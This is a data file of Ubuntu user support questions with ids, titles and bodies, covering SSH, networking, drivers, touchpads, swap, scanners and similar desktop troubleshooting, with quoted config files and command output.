238030	how do i get ssh server to work with putty client ?	i have an ubuntu 12.04.01 desktop pc , 64-bit . it has openssh-server installed . when i ssh to the server from a linux box it works . but when i use putty from my windows 7 pc to connect then i just get an immediate error : the server closed the connection unexpectidely both the server and the pc are on the same lan . both have static ip 's . i have searched but could n't find out why the openssh server immediately closes the connection . it does n't even give the option for login . how can i find and fix this problem please ? edit : sshd_config file contents added : # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords # passwordauthentication yes # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes ignoreuserknownhosts no passwordauthentication yes gatewayports yes allowtcpforwarding yes keepalive yes
238032	could not find plexydesk in dash after installing in ubuntu 12.10 how do i run it ?	i tried many times with these codes sudo apt-add-repository ppa : plexydesk/plexydesk-dailybuild sudo apt-get update sudo apt-get install plexydesk and successfully its installed . but when i typed plexydesk in my dash i could not find any thing . its not showing . how can i get it to work ? if any one know please describe me . do i need to re-install it again with another way ? or is there any way to open and run the program ?
238037	what 's the best way to set the touchpad properties and behaviour ?	currently there are just too many places to set touchpad properties and behaviour . the default sytem settings moused and touchpad tool . the dconf-editor key /org/gnome/settings-daemon/plugins/mouse/ the synclient tool the syndaemon tool the xinput tool the gpointing-device-settings tool . editing files inside the /etc/x11/xorg.conf.d/ directory i would n't be surprised if there were even more places ... . can i use a single place to control the touchpad , and get rid of overthing else ? synclient seems to cover all the bases , but should i do this a different way ? currently syndaemon seems to be run by lightdm , and i ca n't tell if it 's interfering with my synclient settings referring to disabling the touchpad while typing , or not . i also would n't know how to stop lightdm from starting an instance of syndaemon if that was the case . the gpointing-device-settings tool , while nice , seems obsolete and does n't write the settings anywhere meaningful , so it has to be run each time the system is either woken up from sleep or reboot . it seems the key at dconf-editor must be deactivated in order for x11 to gain control over the touchpad , otherwise there 's no way to know who 's controlling who ( x11 or gnome ) . why are there two instances of controlling the touchpad . is it better to leave gnome under control or x11 ? there 's no way to tell what the default system settings touchpad section does , after using any of the other methods . is it overriden by synclient , xinput , xorg.conf.d files or viceversa ? finally , it 's unclear if i should use synclient or xinput , which one takes precedence , etc . i 'd appreciate any guidance here .
238040	how do i fix name service for vagrant client ?	i am new to ubuntu ( having just installed ubuntu 12.10 ) and want to start developing with it . so i have installed vagrant , downloaded lucid64.box , initialized , started it up and accessed it via ssh . to the test the internet connection on my client i 've done ping google.com and received unknown host : google.com . ( host got ping of course . ) searching the web only got me to this solution which suggested to remove vagrant and virtual box , and re-install them , just make sure vagrant installed first . i 've tried this solution and i am still getting the same results . what else can i try to get it to work ?
238044	why is '127.0.0.1 ' trying to connect to '10.0.0.2 ' ?	on a lan each computer is assigned a different ip address each morning . when i installed kubuntu 12.10 the ip address assigned to the machine was 10.0.0.2 , but today it is 10.0.0.1 . when i try to connect to http : //127.0.0.1 in firefox i see in the status bar connecting to 10.0.0.2 . however , there is no mention of that address in the /etc/hosts file : 127.0.0.1 localhost 127.0.1.1 bruno # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters note that setting the dhcp server to assign the same ip address per mac address can not be done as the router is unplugged each evening ( electrical issues in the building ) and loses the settings .
238045	how to setup vlan on same subnet as ethernet	so this is what i 'm trying to do : i have a physical nic with dev name eth0 with ip 192.168.1.2 and gateway 192.168.1.1 and i want to setup a vlan with ip 192.168.1.x and same gateway as eth0 . setting up the vlan runs smoothly and i give the vlan a iface name of eth0.10 and an ip of 192.168.1.69 . now when trying to establish a connection i get an error : holmen @ filserver : ~ $ sudo ifup eth0.10 set name-type for vlan subsystem . should be visible in /proc/net/vlan/config rtnetlink answers : file exists failed to bring up eth0.10 . so how do i get the vlan to connect to the internet and what does the error message mean ? my guess s that it have something to do with the broadcast . please help ! settings : /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp address 192.168.1.2 netmask 255.255.255.0 network 192.168.1.0 gateway 192.168.1.1 iface eth0.10 inet static address 192.168.1.69 netmask 255.255.255.0 gateway 192.168.1.1 i have removed the auto eth0.10 since i dont want to establish it at startup settings : ifconfig holmen @ filserver : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1a:4d:5b:02:5c inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21a:4dff : fe5b:25c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11670807 errors:0 dropped:0 overruns:0 frame:0 tx packets:22363842 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:833725090 ( 833.7 mb ) tx bytes:31876321312 ( 31.8 gb ) interrupt:44 base address:0x4000 eth0.10 link encap : ethernet hwaddr 00:1a:4d:5b:02:5c inet addr:192.168.1.69 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21a:4dff : fe5b:25c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:432 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:41501 ( 41.5 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4899 errors:0 dropped:0 overruns:0 frame:0 tx packets:4899 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:697405 ( 697.4 kb ) tx bytes:697405 ( 697.4 kb ) settings : netstat output holmen @ filserver : ~ $ netstat -anr kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0.10 test : ping output domain name holmen @ filserver : ~ $ ping -i eth0.10 www.dn.se ping a1910.g1.akamai.net ( 23.60.69.161 ) from 192.168.1.2 eth0.10 : 56 ( 84 ) bytes of data . from filserver.local ( 192.168.1.69 ) icmp_seq=1 destination host unreachable from filserver.local ( 192.168.1.69 ) icmp_seq=2 destination host unreachable from filserver.local ( 192.168.1.69 ) icmp_seq=3 destination host unreachable ^c -- - a1910.g1.akamai.net ping statistics -- - 5 packets transmitted , 0 received , +3 errors , 100 % packet loss , time 4025ms pipe 3 test : ping output ip addr holmen @ filserver : ~ $ ping -i eth0.10 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) from 192.168.1.2 eth0.10 : 56 ( 84 ) bytes of data . from 192.168.1.69 icmp_seq=1 destination host unreachable from 192.168.1.69 icmp_seq=2 destination host unreachable from 192.168.1.69 icmp_seq=3 destination host unreachable ^c -- - 8.8.8.8 ping statistics -- - 5 packets transmitted , 0 received , +3 errors , 100 % packet loss , time 4023ms pipe 3
238047	how do i mount an encrypted /home directory on another ubuntu machine ?	i 've done something a bit , well , strange . i installed ubuntu 12.04 directly onto a usb thumb stick , encrypting the /home directory as given the option during the install . the filesystem is btrfs , i believe . i 've now stuck this into my computer running ubuntu , and i 'd like to copy a file onto the usb stick . how can i go about mounting the encrypted home directory so i can copy files to it ?
238048	how to i insert a command into a script located on a remote server ?	i want to insert rm $ 0 in a script ( /home/user/config-script ) located on remote server with echo `` rm $ 0 '' > > /home/user/config-script with expect . but fail because expect interprets $ 0 . var1= '' rm \ $ 0 '' expect -c 'spawn ssh user @ 192.168.1.200 ; expect `` password '' ; send `` 123456\n '' ; \ expect `` @ '' ; send `` sudo -k\n '' ; expect `` @ '' ; send `` sudo su\n '' ; expect `` password '' ; \ send `` 123456\n '' ; expect `` @ '' ; send `` echo ' $ var1 ' > > /home/user/config-script\n '' ; \ expect `` @ '' ; send `` exit\n '' ; send `` logout\n '' ; interact' any help ? thanks in advance . missing `` while executing '' send `` echo rm '' could n't read file `` \ $ 0 > > /home/user/config-script\n '' ; expect `` @ '' ; send `` exit\n '' ; send `` logout\n '' ; interact '' : no such file or directory in fact , on remote server i have an file called `` /home/user/config-script '' . like this : # ! /bin/bash echo `` my script '' finally , i want this script to be : # ! /bin/bash echo `` my script '' rm $ 0
238049	how do you get yuan usb dvb-t tuner to work in ubuntu ?	the key problem i am having is that there appears to be no information on this specific tuner available . it is a usb dvb-t/atsc tuner , and that is all the information i could find , excluding that it is made by the yuan high-tech development co. lsusb | grep yuan bus 001 device 005 : id 1164:1ee9 yuan high-tech development co. , ltd i have downloaded firmware for similar devices by the same company that is given by the linuxtv wiki ( dvb-usb-dib0700 ) and that does n't appear to work . the fact that when you google : `` 1164:1ee9 '' linux , you only get 3 results the first of which is related to a wifi driver and is not relevant to this issue , the second of which claims to have the driver but 404 's when you attempt to get it , the third of which is a russian page about touchscreens . as you can see none of those links are very useful in regards to tv tuners . `` yuan mc782/pd782s dvb-t hybrid tv avs video capture drivers '' is the name of the driver it appears this device uses on windows operating systems if that is any help . ( information provided to me by danial jose ) if anybody could offer assistance on this issue , it would be extremely helpful and perhaps others with this same card will be able to get it working also .
238050	most proper way to launch a bunch of apps	i have a bunch of apps that i use constantly : chromium , thunderbird , terminator , double commander , sublime , etc ... what 's the proper ubuntu way to launch them all at once ? not having to launch each one of them ... should i add an entry in startup applications for every one ? should i continue using a start_apps.sh script like this one : # ! /bin/bash nohup doublecmd & nohup thunderbird & nohup skype & nohup subl & nohup clementine & nohup terminator & nohup chromium-browser and using alt+f2 - > run ./scripts/start_apps ? gnome-shell @ 12.04
238051	how do i change the permissions for my usbs ?	for some reason i have discovered that i can no longer edit any of the data i have on my usbs . i was once able to edit it and i am able to edit the data on it on other pcs . i am running 32 bit 12.10 if this detail is required .
238057	why is fglrx 's package version higher than fglrx-updates ?	i 'm having problems with the dri infrastructure and the fglrx drivers . when searching for a solution i have noticed that in synaptic the fglrx package is at version 9.002 and fglrx-updates is at 8.960 , what is the canonical policy on this ? what is the point of having an updated version much older than the standard version ? i 'm on ubuntu 12.04 amd64 .
238059	how to build plasma netbook ?	i got source code of kde-workspace from repository as below : sudo apt-get build-dep kde-workspace apt-get source kde-workspace and then , i switched to plasma netbook shell source directory , and run cmake : cd kde-workspace/plasma/netbook/shell mkdir build cd build cmake ../ and after this , i get error : cmake error at nettoolbox/cmakelists.txt:7 ( kde4_add_plugin ) : unknown cmake command `` kde4_add_plugin '' . -- configuring incomplete , errors occurred ! it 's possible to build plasma netbook separately from kde-workspace ?
238060	lenovo thinkpad e530 nvidia gt 630m ubuntu 12.04	i have problem with the nvidia drivers . when i update xorg and enable 1 of the 4 posible drivers and restart the screen is becoming small with big icons and this is for every driver i try . can someone help me please . also many times when i work the screan lag i can not start console , can not move mouse , canot reboot and the only way is `` hard way '' i must coldly turn off my laptop . the question is : is this a hardware ( in windows 2007 i dont have this problem ) or software problem and how to solf it ?
238061	ubuntu 12.04 increase swap	i have installed a unbuntu 12.04 and want to increase my swap size from 1gb to 4gb can anyone tell how to do this ? /dev/sda5 partition 1046524 568284 -1
238062	mouse buttons no longer working after updates	i am running ubuntu 12.04 . i did some updates . after restarting the computer , the buttons on my touchpad and wired mouse no longer work . i had this trouble before with the left button on the touchpad . in that case i plugged a mouse in and it worked fine . now , i ca n't do anything except move the mouse around . i need a fix , fast . i have tried everything i 've come across online ; some help would be most appreciated !
238071	inspite of the options the screen locks after x minutes	the os ubuntu 12.10 is installed on my computer . i want my computer never locks the monitor 's screen . so that i chose the item `` never '' in the option `` lock the screen after ... '' . but it does n't work . what should i do to improve it ?
238077	what 's the minimal compatible linux kernel version required to run ubuntu ?	why older kernel ? for whatever reason out there , you might be forced to run another kernel than the ones provided by ubuntu . it may even take you back a few years for a kernel that is compatible with specific precompiled kernel modules , your xen/container-based vps provider may force you to use his kernel , etc . i have this question for a long time , but this sparked it again today . in such a case it would be very useful to be able to say whether you can blame the kernel for issues or whether you should even bother to try to set up a more recent version of ubuntu in your situation . policy , documentation ? i 'm particularly interested in what the objectives of the developers/qa are in this regarding lts releases and newer stable running the lts-kernel . some closely related questions : what is the policy on compatibility with earlier kernel versions ? e.g . no bug reports accepted , must work with all kernel versions back to and including previous lts , etc . example case , practically : how likely will i be in trouble when running lucid 's kernel on precise ? to what extent is software relatively close to the kernel ( udev , gvfs , mdadm etc . ) being tested on other than the version provided with the release ? how does desktop/server edition differ in this ? the most obvious place to look at this would be the release notes . however , besides updates/changes to the ubuntu flavoured kernel , this does n't mention anything about compatibility with other kernels , while kernel-related features are being mentioned in other parts of the notes , e.g . software raid now supports bad block management ( md ) . is ubuntu simply not bothering about these cases or am i missing a resource on this ? besides the release notes , i have used google to quite some extent using keywords : ubuntu 12.04 minimal kernel version required and several variants to it . yet , no statement about it appears to be made on those results . i now find this question popping up as only relevant resource . i did find this answer , tough , and it looks very promising , yet it 's about a specific issue/environment and not really about server/desktop usage . userspace vs kernel i know most pieces of userland software should not bother about kernel versions , but it 's getting more complicated for vpn software or applications interacting with hardware , like the one above , but also for example v4l2 , network manager , alsa , etc . debian vs ubuntu debian is really clear on this . already for wheezy , we know that if you rely on udev , it will require 2.6.26 to run properly from it 's release notes ( in the works ) : the udev version in wheezy requires a kernel of version 2.6.26 or newer with [ ... ] what i 'm not asking for i am very well aware about the backports provided for newer kernels from newer releases to the current lts version . this question is about the opposite . please avoid any discussion like `` why would one want to run an older kernel ? '' - you just do n't have a choice sometimes and it 's not about what we want , but how one can deal with such a given situation .
238083	sound card is n't detected sometimes at startup - seems kind of random	sometimes my soundcard is n't detected at startup . i use ubuntu 12.10 . it seems like , when my headphones are jagged in at startup , my system can detect my audio card . then i can unjag my headphones and use my speakers . when starting up with my headpones unjagged , then it ca n't detect my soundcard . i ca n't get the same effect by forceloading alsa with `` sudo alsa force-reload '' , i have to do a restart with my headphones jagged in , in order for ubuntu to detect my sound output . it 's just onboard audio , nothing fancy . at the toppanel , it looks like the sound is just muted . however , i ca n't unmute it , and when i go into the sound settings , under `` output '' , there is n't displayed any audio devices . i tried a tip in the terminal with the alsamixer app , disabling automute : http : //www.unixmen.com/2012003-howto-resolve-nosound-problem-on-ubuntu/ that does n't work . and for some reason , adding the ppa for the dev-version of alsa as suggested in the link above does n't upgrade alsa . lspci -nn | grep audio 00:14.2 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) [ 1002:4383 ] 04:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati juniper hdmi audio [ radeon hd 5700 series ] [ 1002 : aa58 ] hope you guys can help me out ! i have really used time figuring this out myself , but ca n't for the life of me figure it out . thanks in advance
238087	how to apply a python patch on installed library	i have a linux box with root access . i 've django library installed as uncompressed python egg . now i want to install this patch . how can i do it ?
238088	slow samsung 830 ssd !	i did a fresh install of xubuntu 12.04.1 , ext4 with discard option & swappiness set to 0 , mounting temp directory in ram , ( 8gb . ) i found performance was not stellar , in fact , marginally better than traditional spinning storage media . this drive has had good reviews , yet i have seen windows users complaining of slow performance online . it was anything other than zippy , with application loads being plain dog slow & not instant like i expected . i rmad it eventually ( gsmartcontrol would never complete long test . ) slow performance on windows = slow performance on linux ? would i fare better with another brand ? i now have a 840 & it is not legendary , but faster than hdd .
238090	why re-enabled sources are still marked as `` disabled on upgrade to quantal '' ?	after having a lot of software sources disabled on upgrade to lubuntu quantal ( see question here ) i have decided to re-enable most of them , which i did , without problems , except that the note that they were `` disabled on upgrade to quantal '' is still there . why is that , and what does that mean at this point ?
238097	can not allocate free space , format extended partition	i can not create a partition on free space , neither can i delete the extended partition . disk utility says can not delete extended partition while logical partitions exist
238098	scrolling and display problem ( bug ? ) in libreoffice 3.6 and above	this problem started with a new version of libreoffice , 3.6.2.2 . ( the one with the new green splash screen instead of the old white one ) and continued up to the latest 4.x versions . my documents are not displayed properly when i scroll up or down . the problem appears only above a certain zoom level and is the same in odt or doc . example . have pasted a text here after scrolling down : and down : and then up : clicking on the text restores it but it always goes back to the beginning which is the only part that is visible in this way - and larger documents are almost unusable ! the document can be taken under control if the zoom is equal or lower than 180 % . it may vary depending on display and resolution , but it seems to me that the problem disappears as soon as the zoom goes down so that the page is largely within the margins of the maximized window . on my display the comfortable zoom level ( the one that i would prefer to use , and can not ) would be 230 % ( e. g. with 11 arial ) . this also affects other parts of the office suite ( calc , impress ) . i never had display problems with this laptop before , and previous versions of libreoffice worked ok . i have tested with a live usb and the same libreoffice version and the problem appears in the same manner . this happened initially in lubuntu 12.10 , and then in xubuntu 12.10 too , and in all versions of libreoffice above 3.5 . i am able to use msoffice 2007 under wine with no problem . to avoid the present issue , i use libreoffice 3.5 .
238107	how to compile shrew vpn xubuntu 12.10 with cmake ?	i am trying to install shrew vpn xubuntu 12.10 and can not compile with cmake . here is the error i am receiving : $ cmake -dcmake_install_prefix=/usr/local -dqtgui=yes -detcdir=/etc -dnatt=yes -- using install prefix /usr/local ... -- using etc path /etc ... -- using lib path /usr/local/lib ... -- using man path /usr/local/man ... cmake error at cmakelists.txt:196 ( message ) : unable to locate openssl crypto include files -- configuring incomplete , errors occurred ! i am using the latest stable release of shrew vpn .
238110	how do i enable compound tcp ( ctcp ) ?	i would like to use compound tcp in ubuntu . the wikipedia page says : in addition to windows , ctcp was also ported to linux [ ... ] since kernel version 2.6.17 the module has been incompatible and fails to compile due to kernel api changes . is there a newer implementation that works correctly ?
238111	is this the right way to enable power saving with bumblebee ?	i am dual booting . win7 for the occasional game , and ubuntu 12.10 for everything else . i 've got a nvidia 680m 4gb gpu . at https : //wiki.ubuntu.com/bumblebee if i only want to install bumblebee for its power savings feature . is it enough just to run : `sudo apt-get install -- no-install-recommends bumblebee linux-headers-generic` or should i install the proprietary drivers from nvidia , via : `sudo apt-get install bumblebee bumblebee-nvidia linux-headers-generic` . is there any difference for power saving between the two drivers ?
238116	how do i undo and install the proprietary gpu driver ?	at https : //wiki.ubuntu.com/bumblebee i did steps 1 to 3 . however , instead of doing step 4 , i did : sudo apt-get install -- no-install-recommends bumblebee linux-headers-generic ? if one day , i wanted to install the proprietary drivers instead . how would i undo this ? will running sudo apt-get install bumblebee bumblebee-nvidia linux-headers-generic do it , or would i need to do other things first ?
238117	why does ubuntu one sync modified files just on one device ?	the files on my pc are in sync with my android tablet via ubuntu one . if i modify a file on my pc the changes are correctly sync 'd to the tablet . however if i modify a file on my tablet , save it and sync it , it does not send the changed file back to the pc . i have already checked my settings but could n't find anything useful to solve this problem .
238121	how to convert dvd to wmv ( or another format acceptable by windows movie maker ) ?	i need to convert dvd to wmv file or another format acceptable by windows movie maker ( video is going to be edited on windows machine ) . what software should i use ?
238127	can apps created using quickly for ubuntu be used in windows or mac ?	like the topic or how to develop cross platform application based on html and css with system files dealing ? i used to use wxpython , but after several web development projects it scares me . i love html and css way of build ui .
238133	ubuntu is not booting ( windows ubuntu installer )	its the first time i used the windows ubuntu installer ( wubi ) . i installed ubuntu and everything went great , it then asked me to reboot my laptop and i kindly did , it went well , showed me the optional boot up windows 7 and ubuntu in the grub menu . but when i booted into ubuntu it gave me only an underscore sign : _ and remains like this . i haven`t tried to wait more then 20 minutes but i think this time should be enough for anything to show up what can i do to fix this ?
238136	how to find all images with a certain pixel size using commandline ?	i am trying to find all jpg images within a folder with subfolders that have either width or hight below 300px . this way i want to detect old thumbnails and delete them . for sure i can find all images using find : find . -iname `` *.jpg '' -type f | ... but what follows after the pipe ? which package can i use to detect picture 's attributes ?
238138	ubuntu one indicator applet not showing in xfce	i have recently installed the xubuntu desktop alongside ubuntu on my netbook , as it 's lighter . i also have the ubuntu one indicator applet , which shows up fine in the ubuntu desktop but is replaced by something rather less appealing in xubuntu . here 's the screen shot - look to the right of the network indicator : can i get the regular applet to show on the xubuntu desktop ?
238140	internet timeouts with tp-link tl-wn821n v2 wireless usb stick	a short time after accessing the internet , the browser/download times out . before the timeout , the internet works ok briefly ; afterwards , the wireless is still connected with a strong signal , but every internet access results in a timeout . when i leave the pc for a while , the internet is back just to timeout again as soon as i start using it . the same happens when i reconnect to the router . also , when i surf the internet , it takes a couple of minutes until the timeout , but when i download something , it times out in a matter of seconds . the wireless adapter works just fine in windows and internet via ethernet cable works just fine in ubuntu . does anyone have the same problem or knows a solution . i use ubuntu 12.10 x64 . the problem occurs since i installed ubuntu ( which was a few days ago ) . here some stuff that might be usefull : serus @ serus-ubuntu-pc : ~ $ lsusb bus 002 device 002 : id 0cf3:1002 atheros communications , inc. tp-link tl-wn821n v2 802.11n [ atheros ar9170 ] serus @ serus-ubuntu-pc : ~ $ lsmod module size used by carl9170 82083 0 serus @ serus-ubuntu-pc : ~ $ modinfo carl9170 filename : /lib/modules/3.5.0-21- generic/kernel/drivers/net/wireless/ath/carl9170/carl9170.ko alias : arusb_lnx alias : ar9170usb firmware : carl9170-1.fw description : atheros ar9170 802.11n usb wireless serus @ serus-ubuntu-pc : ~ $ iwconfig wlan0 ieee 802.11bgn essid : '' virginmedia0137463 '' mode : managed frequency:2.462 ghz access point : a0:21 : b7 : f8:29 : b6 bit rate=240 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=66/70 signal level=-44 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:1399 invalid misc:18 missed beacon:0 serus @ serus-ubuntu-pc : ~ $ sudo lshw -c network *-network description : wireless interface physical id : 1 bus info : usb @ 2:2 logical name : wlan0 serial : 00:27:19 : bb:00:19 capabilities : ethernet physical wireless configuration : broadcast=yes driver=carl9170 driverversion=3.5.0-21-generic firmware=1.9.4 ip=192.168.0.6 link=yes multicast=yes wireless=ieee 802.11bgn
238141	how do i install 64-bit ubuntu server on macbook ?	apparently , macs have trouble booting the standard ubuntu iso images ( see ref ) . [ macs ] apparently ca n't cope with multi-catalog cds , and simply refuse to boot them ... [ colin watson ] therefore created the amd64+mac cd images , which are exactly the same as the amd64 images except that they only support bios booting . macs are happy to boot these in their bios emulation mode . i 'd like to install ubuntu server 12.04.1 lts but get an error when booting from an install disk . from what i 've gathered , it seems like a solution is possible and therefore should be achieved . this is what i would like to do and any assistance in alternative boot methods or creating a 'bios boot only server image ' would be greatly appreciated . update : installing refit gives hope but no progress . still boots disk with the same error : 1 . 2 . select cd-rom boot type : _ update 2 : successfully installed ubuntu 12.04.1 desktop amd64+mac . going to attempt to install the server version from within linux next .
238143	my internet connection keeps failing	hello . i recently installed ubuntu 12.10 64-bit . while i am just browsing the internet , network connectivity is fine . however , when i watch a movie or download something the internet connection fails . if i reboot the modem , everything works , but not for long . how do i correct this problem ?
239149	`` the system is running in low graphics mode '' i get this message when i boot my ubuntu	i had got into a serious problem while solving my the system is running in low graphics mode using this link . this guy and i have almost same nvidia card . mine is just bit more newer , so when i was on step # 13 i completed it and rebooted my computer and my screen resolution got shrinked while my problem has not solved instead i have lost my unity and all can see is a blank screen with only my destop icon and shrunken screen in center . i get unity back when i remove the nvidia-current package my actual problem was that when i boot ubuntu i get a screen saying : the system is running in low graphics mode . your screen , graphics card and input device settings could not be detected correctly . you will need to configure these yourself . and i was able to login after few tries .
239152	how to set the launcher hide delay time ?	the question is , how can i set the launcher auto-hide delay time to 0 ? what i want is for the launcher to instantly disappear when i move the mouse away from it . please note this is nothing to do with the hide-animation duration , as the animation only begins after a delay . it is this delay setting i need to find . it 's very easy to set the reveal delay to zero , but i ca n't find the hide delay setting .
239153	how do i install tk 8.5 ?	where can i find the tk packages ? $ sudo apt-get install tk8.5 reading package lists ... done building dependency tree reading state information ... done package tk8.5 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'tk8.5 ' has no installation candidate
239157	how to get back my proper display driver settings after ( wrongly ) installing amd catalyst control center ?	after having this problem , and following this answer , i have installed amd catalyst control center ( fglrx-amdcccle ) and after reboot my display was all wrong , stuck to 1280x1024 . i have un-installed it but could not repair it . before all this happened , running lspci -nnk | grep -ia2 vga i got : 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati m24 1p [ radeon mobility x600 ] [ 1002:3150 ] subsystem : hewlett-packard company nx8220 [ 103c:0934 ] kernel driver in use : radeon but now i get : 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati m24 1p [ radeon mobility x600 ] [ 1002:3150 ] subsystem : hewlett-packard company nx8220 [ 103c:0934 ] kernel modules : radeon , radeonfb for some reason a radeonfb appears beside radeon as kernel driver in use . how to go back to the previous state ?
239158	how to burn a region free dvd from a dvd movie locked to a specific region ?	a friend of mine have a dvd movie locked to a different region . hopefully , i seem to have a region free dvd player in my laptop . how can i burn a region free copy of his dvd movie so my friend can watch it ?
239159	microsoft wireless mouse and microsoft wireless keyboard does not work together	if i plug in my usb microsoft wireless mouse and usb microsoft wireless keyboards at the same time , then the mouse and keyboards both become jittery . the mouse will stop moving smoothly and the keyboard will pause between key strokes . initially i guessed this was signal interference with one-another , but it only happens after about 20 minutes of work ( which is odd ) , and also only under ubuntu . any ideas how this can be fixed ? are there alternative drivers that i can try ?
239160	manually duplex printing using hp laserjet p1106	i have recently brought hp laserjet 1106 printer . i have installed it and it is working fine . but problem is i want to print on both side of the paper . but i am not getting any option to do that . i am not even getting the option to print only odd or even pages . can any one help me in this regards . thanks in advance .
239162	1 tb dell usb hard disk not getting recognized	dell usb hard disk not recognized in ubuntu 11.10 when i insert the usb disk i do not see it in nautilus ( left hand pane ) lsusb surprisingly fails to report any pciid : vendor id related to the removable usb inserted i checked when the disk was not attached sudo lsusb > without_disk and when disk was attached sudo lsusb > with_disk and diff without_disk with_disk there was no difference and also checked dmesg the only thing after inserting usb in the usb slot dmesg shows is [ 69.540224 ] usb 2-1 : new high speed usb device number 2 using ehci_hcd [ 69.674505 ] scsi7 : uas [ 69.675815 ] scsi 7:0:0:0 : direct-access dell usb portable hdd 040d pq : 0 ansi : 6 i do not see any pci id : vendor id combination with lsusb for this 1 tb hard disk . the hard disk is working correctly on a windows 7 system so problem here is with ubuntu 11.10 only . what could be the issue ? it is a new usb hard disk this one
239163	how to get to the grub menu on an acer	i have started the computer a few different times and tried holding the shift key , nothing happens then i tried the space key and it just beeps at me . i can get into setup with f2 as it is booting though
239165	computer seems to be frozen during reboot after installation . how long should the reboot take ?	i 'm attempting to dual-boot my laptop with windows 7 and ubuntu 12.10 . everything to my knowledge has gone perfectly , up until now . the installation was success . consequently , the computer began the typical reboot . a black screen appeared with a bunch of esoteric code . it looks like an enumerated list of tasks the pc is trying to complete . unfortunately , once it got to step 53 , it stopped there and has n't done anything else for the last hour and a half . the computer is obviously still processing something due to how heated it 's getting . i 'm just concerned that something has gone terribly wrong . can anyone please help ? the text reads : [ 53.252069 ] cr2 : fffffffffffffffffffffff '' computer seems to be frozen during reboot after installation . how long should the reboot take ? ''
239169	how to edit /etc/resolv.conf on ubuntu 12.04	i have two network interfaces configured via dhcp . as a result , /etc/resolv.conf is populated with information coming from the dhcp server . how can i edit this file ? i know that if i add prepend domain-name-servers 127.0.0.1 to /etc/dhcp/dhclient.conf i can obtain nameserver 127.0.0.1 as the first ( and only ) line of /etc/resolv.conf . what if i want 127.0.0.1 and only one of the two nameserver addresses provided via dhcp ?
239175	how do i use a `` mustek bearpaw '' scanner ?	i own a mustek bearpaw 2448cu pro ii scanner . how do i use it with ubuntu ?
239176	alternative to qjoypad	i 'd like to know if there is any alternative to qjoypad , i 've tried to install it , but it 's only available from the source and is not possible to compile it , because of some errors . anyway , you ca n't install it from a deb package , because it was packed into deb for the last time in 2004-09-19 according to its official web-page in source forge . so i 'm here asking for a software recomendation or an alternative to qjoypad . what 's qjoypad : a qt-based program that takes input from joystick/gamepad devices and produces keyboard or mouse activity in xwindows . great for games with no or mediocre joystick support as well as for emulation . easy to set up . supports any number of devices . from : source forge edit : the error message is the following : error : you will need libxtst to compile this program and this compiler ( i think ) ins't available in the repository , just it 's libxtst-doc .
239177	installing software on lubuntu without a browser	i have installed lubuntu without a browser . i ca n't figure out how to download and install new software on it . should i reinstall lubuntu ?
